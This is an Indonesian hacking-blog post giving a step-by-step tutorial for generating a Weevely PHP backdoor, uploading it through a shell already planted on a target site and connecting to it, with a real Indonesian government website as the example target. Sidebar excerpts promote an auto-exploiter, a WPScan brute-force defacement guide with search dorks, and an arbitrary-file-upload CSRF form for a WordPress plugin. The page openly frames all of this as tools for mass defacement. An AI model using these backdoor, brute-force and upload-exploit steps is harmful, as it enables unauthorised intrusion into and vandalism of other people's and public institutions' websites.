Skip to main content

Backconnect Server di Android dengan Weevely


Hay guys...
Kali ini gw bagiin tutorial Backconnect Server di Android dengan Weevely

Apa itu Backconnect ?

Backconnect biasanya digunakan untuk server yg tertutup proxy atau firewall. sehingga tidak bisa di lakukan remote connect. Jadi salah satu triknya adalah membalik koneksi, yaitu mengkoneksikan dari server ke komputer kita

jadi jika kita sudah koneksi dengan server maka kita bisa melakukan apa saja di server tersebut mengedit mengupload dan lain2
dan biasanya backconnect server digunakan oleh defacer untuk mass deface
dengan cara rooting server

Kali ini gw pake Termux, dan pake Chroot ubuntu
Untuk install Chroot ubuntu nya bisa dengan install manual di sini atau dengan auto install di sini

Cara install Weevely :

Pertama kalian buka chroot ubuntu nya, dan ketikkan kode di bawah ini

   root@localhost:~# apt-get install wget unzip
   root@localhost:~# apt-get install g++ python-pip libyaml-dev python-dev
   root@localhost:~# pip install prettytable Mako PyYAML python-dateutil PySocks --upgrade
   root@localhost:~# wget http://sarzafie.esy.es/script/weevely3-master.zip
   root@localhost:~# unzip weevely3-master.zip

Setelah kita install weevely nya, kita buat backdoor nya dulu

Cara membuat backdoor weevely :
  
Masuk ke dir weevely nya terlebih dahulu


  root@localhost:~# cd weevely3-master
  root@localhost:~/weevely3-master# python2 weevely.py generate <password> <path>

Contoh  : 

  root@localhost:~/weevely3-master# python2 weevely.py generate verluchie verluchie.php

Setelah kita buat backdoor nya, kita uplod ke web target lewat shell kita yg sudah di tanem di web target
Dan untuk backconnet nya sendiri, kita ketikkan kode di bawah ini

  root@localhost:~/weevely3-master# python2 weevely.py <url> <password>

Contoh

   root@localhost:~/weevely3-master# python2 weevely.py http://kpi.go.id/verluchie.php verluchie

Sekian tutorial kali ini semoga bermamfaat
jangan lupa share yak :v
komen di bawah jika tidak dimengerti oke oce

 
  


Comments

Popular posts from this blog

XAttacker Website Vulnerability Scanner & Auto Exploiter 

squadcyber.org - XAttacker adalah Website Vulnerability Scanner & Auto Exploiteryang di tulis dalam bahasa pemrograman Perl untuk menganalisis sebuah celah web dan meng eksploitasi nya secara otomatis. Tool ini fungsi nya hampir sama seperti yang gw posting sebelum nya yaitu Mr. Spy Bot Auto Deface   . Fitur   Auto Cms Detect [1] WordPress : [+] Adblock Blocker [+] WP All Import [+] Blaze [+] Catpro [+] Cherry Plugin [+] Download Manager [+] Formcraft [+] Power Zoomer [+] Gravity Forms [+] Revslider Upload Shell [+] Revslider Dafece Ajax [+] Revslider Get Config [+] Showbiz [+] Simple Ads Manager [+] Slide Show Pro [+] WP Mobile Detector [+] Wysija [+] InBoundio Marketing [+] dzs-zoomsounds [+] Reflex Gallery [+] Creative Contact Form [+] Work The Flow File Upload [+] WP Job Manger [+] PHP Event Calendar [+] Synoptic [+] Wp Shop [+] Content Injection [2] Joomla [+] Com Jce [+] Com Media [+] Com Jdownloads ...

Deface Wordpress Bruteforce dengan WPScan

squadcyber.org  - Kali ini gw bagiin tutorial Deface Wordpress Bruteforce dengan WPScan, kenapa WPScan ? kenapa nggak pake tools yang lainnya?. Karena menurut gw tool yang paling manjur untuk Penetration Testing sebuah web yang menggunakan CMS Wordpress adalah WPScan, dan WPScan sering melakukan update pada database nya sehingga bisa memberikan refrensi untuk bug yang di dapat pada waktu scan bug di web tersebut dan bisa meng eksploitasi Web yang menggunakan CMS Wordpress terbaru. Bahan - Bahan  - WPScan ( Untuk Windows bisa kalian lihat di sini , dan untuk android bisa kalian lihat Di sini  )  - Wordlist ( Download Di sini  atau kalian bisa buat sendiri) Dork    - inurl:/wp-login.php (kembangin lagi) Cara Deface Wordpress Bruteforce kali ini gw pake Termux ( android ) karena minim nya fasilitas yang ada :v. Pertama kalian busa folder wpscan nya dengan mengetik $ cd wpscan Setelah masuk di folder wpscan nya , kita scan dulu ...

Deface Dengan Metode Wordpress Plugin DreamWorkGallery

www.squadcyber.org - Yo guys, balik lagi ma ane :v kali ini wa mau kasih tutor pepes pakek metode  Wordpress Plugin DreamWorkGallery. Langsung yok :v Bahan" : Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/ (kembangin ea) CSRF : <form action="http://www.site.co.li/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value=""/> <input type="submit" value="SIKAT!" /></form>  Langsung :v 1. Dorking pakek dork diatas   2. Kalo gini vuln :v Copy url web nya doang. Lalu masukin di CSR...